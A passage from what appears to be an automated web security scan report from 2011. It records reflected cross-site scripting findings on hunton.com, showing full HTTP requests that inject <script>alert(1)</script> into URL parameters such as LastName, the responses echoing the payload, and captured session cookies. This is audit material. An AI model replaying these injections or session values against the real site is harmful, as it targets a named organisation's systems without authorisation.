Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.9.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1843; PortletId=5980402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:40:34 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: NavId=1847; path=/
Set-Cookie: PortletId=5984402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45737


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
<div id="PDFBuilderUrl">http://www.hunton.com/services/uniEntity.aspx?7cf20<script>alert(1)</script>3a817fcf669=1&xpST=ServiceDetailPDF&service=66&pdf=yes</div>
...[SNIP]...

5.136. http://www.hunton.com/professionals/uniGC.aspx [LastName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /professionals/uniGC.aspx

Issue detail

The value of the LastName request parameter is copied into the HTML document as plain text between tags. The payload f4618<script>alert(1)</script>6286371e1b0 was submitted in the LastName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=Kf4618<script>alert(1)</script>6286371e1b0 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=K
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.6.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=1837; ZoneId=0

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:42:58 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/